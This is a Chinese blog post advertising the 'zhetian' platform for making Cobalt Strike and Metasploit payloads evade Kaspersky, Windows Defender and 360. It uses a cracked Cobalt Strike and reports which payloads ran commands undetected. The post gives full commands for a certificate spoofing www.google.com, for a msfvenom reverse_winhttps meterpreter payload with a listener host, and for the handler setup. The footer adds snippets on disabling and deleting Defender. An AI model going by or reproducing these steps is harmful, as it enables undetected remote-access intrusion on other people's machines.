遮天 | 实战绕过卡巴斯基、Defender上线CS和MSF及动态命令执行...

最新推荐文章于 2024-06-03 10:51:09 发布
最新推荐文章于 2024-06-03 10:51:09 发布
阅读量2.4k 收藏 6
点赞数
分类专栏: 渗透测试 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/heartsk/article/details/128043127
版权

zTian.red:绕过卡巴斯基、360安全卫士、Windows Defender动态执行CS、MSF命令...

测试目标:Windows Defender、卡巴斯基、360安全卫士极速版

系统环境:win10 64位   

软件版本:cs4.7破解版、msf社区免费版 

流量通信:http与https

测试平台:遮天对抗平台,地址:zTian.red

测试时间:2022-11-16

一、Cobalt Strike ShellCode免杀测试:

开始:

使用默认无修改teamserver配置,直接运行服务。

添加两个监听,然后生成payload文件。导出payload时文件类型可以选择C、Java、Python。

打开遮天对抗平台,选中要进行测试的payload文件。

选中payload,填入获取到的私钥,然后提交任务。

先各生成一个免杀文件:

DZoOQslVhc.exe(http)、hYyeYdAoHS.exe(https)

测试绕过360安全防护:

另一台s安装360安全卫士极速版的测试终端在下载好生成的文件之后直接被告警。

下载使用http流量的程序,没想到却无任何反应。

云查杀无异常且可以动态执行命令。

测试绕过Windows Defender:

在Defernder下,http和https静态都未被警告。测试运行http类型,被提示病毒。

运行https,未被拦截,且可以执行命令。

测试绕过卡巴斯基:

不愧是卡巴斯基,直接就给我删掉了。依稀记得前几个月还没有给我拦截呢。

重新提交任务,勾选智能反沙箱。

再次扫描成功绕过。

只是反沙箱模块需要诸多条件,如:禁止修改文件名、系统开机时间大于十小时。由于测试机子时间不满足,重新在主机器安装卡巴斯基,测试动态能力。

经过十几秒的等待,成功上线。执行命令,完美响应

总结

360安全卫士静态识别出了https类型程序,没有检测到http类型程序。

Windows Defender静态均未检测到,动态检测到了http类型程序,并且做了拦截。对https类型没有检测到,且动态可以正常执行命令。

卡巴斯基均查杀,开启反沙箱之后成功绕过。注意反沙箱模块禁止修改文件名称,并且系统开机时间需要大于十小时。

二、MSF免杀测试:

 由于我对MSF用法不是那么熟悉,以下仅测试一种方案:

使用windows/shell/reverse_tcp生成的shellcode连接时候流量被检测到,直接拦截,

使用ssl加密流量测试绕过。先生成证书,执行命令:

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \-subj "/C=UK/ST=London/L=London/O=Development/CN=www.google.com" \-keyout www.google.com.key \-out www.google.com.crt && \cat www.google.com.key www.google.com.crt>www.google.com.pem && \rm -f www.google.com.key www.google.com.crt

之后在绝对路径可以看到证书文件

再执行命令生成payload:

msfvenom -p windows/meterpreter/reverse_winhttps LHOST=172.21.194.45  LPORT=8789 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f c

生成完毕之后进入msf控制台执行监听命令:

use exploit/multi/handler set payload windows/meterpreter/reverse_winhttpsset lhost 0.0.0.0set lport 4444set HandlerSSLCert /home/kali/google.pemset StagerVerifySSLCert true set IgnoreUnknowPayloads trueset exitonsession falseexploit

复制shellcode的主要内容部分,新建一个文件将之写入,然后传入遮天对抗平台进行生成。

生成后直接执行,获取到session

使用进入meterpreter之后完美执行命令且无拦截。

扩展:识别Anti Virus进程方式:

执行命令“TASKLIST /SVC”  然后将得到的结果粘贴至下方识别栏里进行识别。

识别出卡巴斯基。

项目地址:github.com/yqcs/zhetian​

观世音_遮天实验室
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
绕过卡巴斯基主动防御系统方法的讨论
10-15 1923
 |=---------------------------------------------------------------------------=||=-----------------=[  绕过卡巴斯基主动防御系统方法的讨论  ]=----------------=||=--------------------------------------------------------
CS(Cobaltstrike)免杀和使用(附脚本)
热门推荐
hackzkaq的博客
07-23 1万+
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 作者:掌控安全-hpb1分享! 一.Cobaltstrike简介 作为一款协同APT工具,功能十分强大,针对内网的渗透测试和作为apt的控制终端功能,使其变成众多APT组织的首选 fireeye多次分析过实用cobaltstrike进行apt的案例。 Cobaltstrike安装 CS需要一个服务器来进行,我们把它放到服务器上。 然后运行./teaserver ip 密码即可。 然后使用CS客户端连接即可,输入对应ip、端口和密码。
红蓝对抗经验分享:CS免杀姿势
m0_61869253的博客
07-27 518
多测试总会有新发现,实践起来相对稍微容易一点儿,不过需要注意免杀之后的效果是最重要的。赛门铁克也未报毒,其它杀软不放图了。但是需要注意的是别使用云沙箱检测。多测试总会有新发现,实践起来相对稍微容易一点儿,不过需要注意免杀之后的效果是最重要的。
简单免杀绕过和利用上线的GoCS
最新发布
2401_84488537的博客
06-03 1098
第一次编写插件和编写 js 文件,无疑是一次面向百度的编程,总体还是不错,学到了很多。遗憾的是 asp 并没有免杀,还希望会 asp 的师傅指导一下。这个版本很基础,很简单进行利用,所以只能在简单环境下利用,希望后面能加入更多的元素,让这个插件适应更多复杂环境。网络安全学习资源分享:给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
CS免杀姿势
qq_53003652的博客
11-07 652
项目地址大家不要放在云沙箱或者直接用杀软单独扫描,这样很快就会让捕捉到不能免杀了。
Flash钓鱼->CS上线(免杀过火绒、360等)
weixin_54227009的博客
05-13 9962
这个马儿是rar压缩的,做成的rar解压自启动,所以是个exe的文件,然后这里为了像一点,把图标给改了。这里砸门为了逼真一点,所以把这个压缩包的图标改成Flash的图标。3、将免杀的exe跟生成的PayloadFile进行压缩。5、将这个exe的压缩包的路径放在砸门服务器上的flash.js上即可。执行路径为:C:\Windows\Temp\Flash.exe。3.4、高级->模式->静默模式->全部隐藏。这里我把解压路径给改成了:C:\Windows\Temp。3.2、 高级->常规->解压路径。
实用cs、mimikatz免杀virscan
xxx9686的博客
09-17 1914
第一步:替换资源,此步骤可以直接免杀360及电脑管家,但是无法过火绒。使用Restorator加载mimikatz后在拖入其他程序资源(此处需要注意,资源需要无毒,资源越好效果越佳。sigthief.py -i 软件文件名 -t 木马文件名 -o 输出位置(此处由于软件从虚拟机中考出有问题,无图)。替换版本及图标资源后,需要给软件上数字签名(正儿八经的软件签名我们没有,可以copy别的软件做伪签名)。简单过360,但是资源未过火绒,在此基础上我们给他添加一个壳即可,任意壳,我们添加vm壳。
win10关闭defender工具及说明.rar
02-26
在提供的压缩包“win10关闭defender工具及说明”中,可能包含了详细步骤和一个专门的工具,帮助用户更轻松地完成这一过程。这个工具可能是通过修改注册表键值或者调整系统策略来实现Defender的禁用。使用这样的工具...
懒人必备一键开启和关闭Windows Defender.zip
06-06
该压缩包内的"懒人必备一键开启和关闭Windows Defender.exe"是一个可执行文件,执行后可以快速操作Windows Defender的状态。请注意,尽管这个工具提供了便利,但频繁或长时间关闭Windows Defender可能会使系统暴露于...
Defender Control v2.1(win11 禁用defender服务工具).zip
05-07
标题中的"Defender Control v2.1(win11 禁用defender服务工具).zip"指的是一款专为Windows 11系统设计的工具,名为Defender Control v2.1,其主要功能是禁用Windows Defender Antivirus服务。Windows Defender是...
彻底删除Defender.EDGE.OneDrive.小娜
07-03
标题 "彻底删除Defender.EDGE.OneDrive.小娜" 涉及到的是在Windows操作系统中,用户希望完全移除Windows Defender安全软件、Microsoft Edge浏览器、OneDrive云存储服务以及Cortana语音助手的场景。这通常是因为用户...
Shadow Defender 2014.1.3.047
05-03
Shadow Defender 2014.1.3.047
红队培训班作业 | 免杀过360和火绒 四种方法大对比
Ms08067安全实验室
08-16 2872
文章来源|MS08067 红队培训班第12节课作业本文作者:汤浩荡(红队培训班1期学员)按老师要求尝试完成布置的作业如下:环境准备:Kali linux安装cs4.2,Windows7系统...
shellCode免杀技巧
qq_39330735的博客
05-15 2291
由上⾯的信息可⻅,国内在1997年出现了第⼀个可以⾃动变异的千⾯⼈病毒,虽然 ⾃动变异也可以看 为是针对杀毒软件的⼀种免杀⽅法,但是由于与免杀⼿法的定义 有出⼊,所以如果将国内免杀技术起源 定位1997年会显得⽐较牵强。2005年2⽉-7⽉:通过各⽅⾯有意或⽆意的宣传,⿊客爱好者们开始逐渐重视免 杀,在类似于免杀技术 界的祖师爷⿊吧安全⽹的浩天⽼师带领下⼀批⿊客开始有越 来越多的讨论免杀技术,这为以后⽊⻢免杀 的⽕爆埋下根基。\t错误值: %d\n", GetLastError());
隐藏你的C2(使用域前置技术隐藏C2服务器,以及使用iptables策略来保护服务器)
Love&Share
12-17 2925
本文将会介绍使用域前置技术隐藏C2服务器,以及使用iptables策略来保护服务器
Cobalt Strike特征修改
qq_52839196的博客
02-07 7682
Cobalt Strike相关特征修改
学习渗透第一节:msf攻击永恒之蓝+生成一句话木马+绕过杀毒软件
m0_66963559的博客
03-31 1488
1.search 漏洞名称或者代号,永恒之蓝的是ms17_010(win10和win11无这个漏洞),exploit攻击利用脚本是进行漏洞攻击,auxiliary辅助是检测漏洞是否存在。5.用set RHOSTS 目标机ip地址,把win8设置为目标机。4.关闭目标机win8的防火墙,ping通kali。渗透之路暂时终止,等我找到能用的win7镜像再继续。3.查看当前模块的设置,show options。2.use 模块前面的数字或者全称。
Cobalt Strike Profile 学习记录
darkb1rd的博客
04-21 2767
此处以最新版 jquery-c2.4.3.profile 为例,学习记录各项配置的作用。部分配置尚未研究清楚适用场景,后续继续学习再补充。 cobalt strike 4.3 官方文档:https://cobaltstrike.com/downloads/csmanual43.pdf 提示 关于参数与值: profile 文件将参数括在双引号中,而不是单引号中。例如:正确: set useragent "SOME AGENT"; 错误: set useragent 'SOME AGENT'; 一些
彻底移除windows defender工具 install_wim_tweak.exe
10-16
要彻底移除Windows Defender工具install_wim_tweak.exe,可以按照以下步骤进行操作: 1. 首先,确保你是以管理员权限登录到计算机上。 2. 打开开始菜单并搜索"命令提示符",然后右键点击"命令提示符"选项,选择"以管理员身份运行"。 3. 在命令提示符窗口中,输入以下命令并按下Enter键:gpupdate /force 4. 接着,再次在命令提示符窗口中输入以下命令并按下Enter键:sc stop WinDefend 5. 然后,输入以下命令并按下Enter键:sc delete WinDefend 6. 最后,输入以下命令并按下Enter键:regsvr32 /u "%ProgramFiles%\Windows Defender\MpClient.dll" 7. 执行完以上命令后,关闭命令提示符窗口。 通过以上步骤,你应该能够彻底移除Windows Defender工具install_wim_tweak.exe。然而,请注意,移除Windows Defender可能会使你的计算机更容易受到恶意软件的攻击。因此,在执行此操作之前,请确保你有安装可靠的第三方安全软件来保护你的计算机。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值